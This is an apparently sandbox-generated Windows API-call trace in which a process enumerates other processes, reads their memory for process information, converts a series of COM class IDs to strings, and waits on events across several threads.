[0572.962] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.962] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0572.987] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x640) returned 0x1f4
[0572.987] GetLastError () returned 0x0
[0572.987] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0572.988] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.988] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0572.988] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x112820, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0572.988] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x1126a6, lpBuffer=0xced2a0, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0572.989] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0572.989] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0572.989] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0572.989] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x111e90, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0572.989] malloc (_Size=0x32) returned 0x3ee140
[0572.990] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x1126d6, lpBuffer=0x3ee140, nSize=0x30, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3ee140*, lpNumberOfBytesRead=0x0) returned 1
[0572.990] free (_Block=0x3ee140)
[0572.991] CloseHandle (hObject=0x1f4) returned 1
[0572.991] _ui64tow (_Value=0x598, _Buffer="1600", _Radix=10) returned="1432"
[0572.993] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1432") returned 4
[0572.994] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0572.994] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.007] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x1f4
[0573.007] GetLastError () returned 0x0
[0573.007] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0573.007] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd7018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.007] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0573.007] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x352850, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0573.008] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x3526c8, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0573.008] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0573.009] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0573.009] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd7020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.009] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x351ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0573.009] malloc (_Size=0x80) returned 0x3f1710
[0573.009] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x35270a, lpBuffer=0x3f1710, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3f1710*, lpNumberOfBytesRead=0x0) returned 1
[0573.010] free (_Block=0x3f1710)
[0573.010] CloseHandle (hObject=0x1f4) returned 1
[0573.011] _ui64tow (_Value=0x7e4, _Buffer="1432", _Radix=10) returned="2020"
[0573.013] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="2020") returned 4
[0573.014] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0573.014] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.026] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e4) returned 0x0
[0573.026] CloseHandle (hObject=0x0) returned 0
[0573.027] _ui64tow (_Value=0x3f8, _Buffer="2020", _Radix=10) returned="1016"
[0573.029] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1016") returned 4
[0573.030] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0573.030] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.042] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x1f4
[0573.042] GetLastError () returned 0x0
[0573.042] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0573.043] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd4018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.043] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0573.043] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x528c0, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0573.043] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x526ca, lpBuffer=0xced2a0, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0573.044] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0573.044] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0573.044] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd4020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.044] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x51ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0573.045] malloc (_Size=0xc6) returned 0x3f1710
[0573.045] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x52702, lpBuffer=0x3f1710, nSize=0xc4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3f1710*, lpNumberOfBytesRead=0x0) returned 1
[0573.045] free (_Block=0x3f1710)
[0573.046] CloseHandle (hObject=0x1f4) returned 1
[0573.046] _ui64tow (_Value=0x48c, _Buffer="1016", _Radix=10) returned="1164"
[0573.048] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="1164") returned 4
[0573.049] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0573.049] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.067] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x48c) returned 0x1f4
[0573.067] GetLastError () returned 0x0
[0573.067] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0573.067] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd3018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.067] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0573.068] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x352350, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0573.068] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x35215a, lpBuffer=0xced2a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0573.068] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0573.069] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0573.069] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffd3020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.069] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x351990, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0573.069] malloc (_Size=0xf4) returned 0x3f1710
[0573.069] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x35219a, lpBuffer=0x3f1710, nSize=0xf2, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3f1710*, lpNumberOfBytesRead=0x0) returned 1
[0573.070] free (_Block=0x3f1710)
[0573.070] CloseHandle (hObject=0x1f4) returned 1
[0573.071] _ui64tow (_Value=0x9c, _Buffer="1164", _Radix=10) returned="156"
[0573.074] _vsnwprintf (in: _Buffer=0xced820, _BufferCount=0x103, _Format="%lu", _ArgList=0xced678 | out: _Buffer="156") returned 3
[0573.074] GetVersionExW (in: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1c0000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="SeȰ\x1c") | out: lpVersionInformation=0xced700*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0573.075] _vsnwprintf (in: _Buffer=0xceda30, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0xced678 | out: _Buffer="6.1.7601") returned 8
[0573.088] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c) returned 0x1f4
[0573.088] GetLastError () returned 0x0
[0573.088] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced530, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced530, ReturnLength=0x0) returned 0x0
[0573.088] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffdf018, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.088] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x77d62660, lpBuffer=0xced678, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced678*, lpNumberOfBytesRead=0x0) returned 1
[0573.088] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x292820, lpBuffer=0xced560, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced560*, lpNumberOfBytesRead=0x0) returned 1
[0573.088] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x2926ca, lpBuffer=0xced2a0, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced2a0*, lpNumberOfBytesRead=0x0) returned 1
[0573.089] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x1, ProcessInformation=0xced6c8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced6c8, ReturnLength=0x0) returned 0x0
[0573.089] NtQueryInformationProcess (in: ProcessHandle=0x1f4, ProcessInformationClass=0x0, ProcessInformation=0xced210, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xced210, ReturnLength=0x0) returned 0x0
[0573.089] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x7fffffdf020, lpBuffer=0xced660, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced660*, lpNumberOfBytesRead=0x0) returned 1
[0573.090] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x291ea0, lpBuffer=0xced240, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xced240*, lpNumberOfBytesRead=0x0) returned 1
[0573.090] malloc (_Size=0x28) returned 0x3efdb0
[0573.090] ReadProcessMemory (in: hProcess=0x1f4, lpBaseAddress=0x29270c, lpBuffer=0x3efdb0, nSize=0x26, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x3efdb0*, lpNumberOfBytesRead=0x0) returned 1
[0573.091] free (_Block=0x3efdb0)
[0573.091] CloseHandle (hObject=0x1f4) returned 1
[0573.093] free (_Block=0x3f1c80)
[0573.093] malloc (_Size=0x48) returned 0x3ed130
[0573.093] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcedab8 | out: lpSystemTimeAsFileTime=0xcedab8*(dwLowDateTime=0x6fca4690, dwHighDateTime=0x1dab599))
[0573.093] SetEvent (hEvent=0x1e8) returned 1
[0573.136] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd9d0
[0573.136] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1fd9d0, pulNumLanguages=0xcee620 | out: pulNumLanguages=0xcee620) returned 1
[0573.136] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9d0 | out: hHeap=0x1c0000) returned 1
Thread:
id = 254
os_tid = 0x1d8
Thread:
id = 255
os_tid = 0x11c
[0655.633] DllCanUnloadNow () returned 0x0
[0655.633] ResetEvent (hEvent=0x1cc) returned 1
[0655.633] GetExitCodeThread (in: hThread=0x1f0, lpExitCode=0x117f470 | out: lpExitCode=0x117f470) returned 1
[0655.633] SetEvent (hEvent=0x1e8) returned 1
[0655.633] WaitForSingleObjectEx (hHandle=0x1f0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0655.643] CloseHandle (hObject=0x1f0) returned 1
[0655.643] CloseHandle (hObject=0x1e8) returned 1
[0655.643] SetEvent (hEvent=0x1cc) returned 1
[0655.644] GetProcAddress (hModule=0x7feff780000, lpProcName="StringFromCLSID") returned 0x7feff789370
[0655.645] StringFromCLSID (in: rclsid=0x3bf2f0*(Data1=0x73e9a405, Data2=0xfa4, Data3=0x11d3, Data4=([0]=0x91, [1]=0xc, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0xa6, [6]=0x30, [7]=0xbe)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{73E9A405-0FA4-11D3-910C-00105AA630BE}") returned 0x0
[0655.645] GetProcAddress (hModule=0x7feff780000, lpProcName="CoTaskMemFree") returned 0x7feff7a8e20
[0655.645] CoTaskMemFree (pv=0x203580)
[0655.645] StringFromCLSID (in: rclsid=0x3de5b0*(Data1=0xe31a80d2, Data2=0xd12f, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1f, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{E31A80D2-D12F-11D2-911F-0060081A46FD}") returned 0x0
[0655.645] CoTaskMemFree (pv=0x203580)
[0655.646] StringFromCLSID (in: rclsid=0x3f00f0*(Data1=0x77609c22, Data2=0xcdaa, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1e, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{77609C22-CDAA-11D2-911E-0060081A46FD}") returned 0x0
[0655.646] CoTaskMemFree (pv=0x203580)
[0655.646] StringFromCLSID (in: rclsid=0x3f0160*(Data1=0x15e4c152, Data2=0xd051, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1f, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{15E4C152-D051-11D2-911F-0060081A46FD}") returned 0x0
[0655.646] CoTaskMemFree (pv=0x203580)
[0655.646] StringFromCLSID (in: rclsid=0x3f01d0*(Data1=0xc2bb0b38, Data2=0x8549, Data3=0x48a6, Data4=([0]=0xa5, [1]=0x8e, [2]=0xe7, [3]=0x4, [4]=0xdf, [5]=0xc1, [6]=0x9d, [7]=0x80)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{C2BB0B38-8549-48A6-A58E-E704DFC19D80}") returned 0x0
[0655.646] CoTaskMemFree (pv=0x203580)
[0655.647] StringFromCLSID (in: rclsid=0x3f0240*(Data1=0xea6034f1, Data2=0xfad, Data3=0x11d3, Data4=([0]=0x91, [1]=0xc, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0xa6, [6]=0x30, [7]=0xbe)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{EA6034F1-0FAD-11D3-910C-00105AA630BE}") returned 0x0
[0655.647] CoTaskMemFree (pv=0x203580)
[0655.647] StringFromCLSID (in: rclsid=0x3f02b0*(Data1=0xddea7e32, Data2=0xcce8, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1e, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{DDEA7E32-CCE8-11D2-911E-0060081A46FD}") returned 0x0
[0655.647] CoTaskMemFree (pv=0x203580)
[0655.647] StringFromCLSID (in: rclsid=0x3f0350*(Data1=0xc9369990, Data2=0xf3a8, Data3=0x4bac, Data4=([0]=0xa3, [1]=0x60, [2]=0x47, [3]=0xba, [4]=0xa0, [5]=0xec, [6]=0x47, [7]=0xa0)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{C9369990-F3A8-4BAC-A360-47BAA0EC47A0}") returned 0x0
[0655.647] CoTaskMemFree (pv=0x203580)
[0655.648] StringFromCLSID (in: rclsid=0x3f03c0*(Data1=0xd60e9c22, Data2=0xd127, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1f, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{D60E9C22-D127-11D2-911F-0060081A46FD}") returned 0x0
[0655.648] CoTaskMemFree (pv=0x203580)
[0655.648] StringFromCLSID (in: rclsid=0x3f0430*(Data1=0xdd3b4892, Data2=0xcd0f, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1e, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{DD3B4892-CD0F-11D2-911E-0060081A46FD}") returned 0x0
[0655.648] CoTaskMemFree (pv=0x203580)
[0655.648] StringFromCLSID (in: rclsid=0x3f04a0*(Data1=0xf54db7bf, Data2=0xfb4, Data3=0x11d3, Data4=([0]=0x91, [1]=0xc, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0xa6, [6]=0x30, [7]=0xbe)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{F54DB7BF-0FB4-11D3-910C-00105AA630BE}") returned 0x0
[0655.649] CoTaskMemFree (pv=0x203580)
[0655.649] StringFromCLSID (in: rclsid=0x3f0510*(Data1=0x643966a2, Data2=0xd19f, Data3=0x11d2, Data4=([0]=0x91, [1]=0x20, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{643966A2-D19F-11D2-9120-0060081A46FD}") returned 0x0
[0655.649] CoTaskMemFree (pv=0x203580)
[0655.649] StringFromCLSID (in: rclsid=0x3f0580*(Data1=0x4d060f17, Data2=0xc791, Data3=0x11d2, Data4=([0]=0xb3, [1]=0x53, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x85, [7]=0x69)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{4D060F17-C791-11D2-B353-00105A1F8569}") returned 0x0
[0655.649] CoTaskMemFree (pv=0x203580)
[0655.649] StringFromCLSID (in: rclsid=0x3f05f0*(Data1=0xedc5c632, Data2=0xd027, Data3=0x11d2, Data4=([0]=0x91, [1]=0x1f, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x1a, [6]=0x46, [7]=0xfd)), lplpsz=0x117f418 | out: lplpsz=0x117f418*="{EDC5C632-D027-11D2-911F-0060081A46FD}") returned 0x0
[0655.650] CoTaskMemFree (pv=0x203580)
Thread:
id = 256
os_tid = 0x1ec
[0564.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0x493e0, bAlertable=0) returned 0x0
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6ae894b0, dwHighDateTime=0x1dab599))
[0564.896] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0x2710, bAlertable=0) returned 0x0
[0572.524] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0573.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6fca4690, dwHighDateTime=0x1dab599))
[0573.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6fca4690, dwHighDateTime=0x1dab599))
[0573.094] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x6fca4690, dwHighDateTime=0x1dab599))
[0573.094] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0x2710, bAlertable=0) returned 0x102
[0583.120] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12cfd98 | out: lpSystemTimeAsFileTime=0x12cfd98*(dwLowDateTime=0x75c27950, dwHighDateTime=0x1dab599))
[0583.121] free (_Block=0x3eef20)
[0583.124] FreeLibrary (hLibModule=0x77c30000) returned 1
[0583.125] free (_Block=0x3f1bc0)
[0583.126] free (_Block=0x3ed130)
[0583.127] WaitForSingleObjectEx (hHandle=0x1e8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
Thread:
id = 277
os_tid = 0x6cc
[0669.490] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
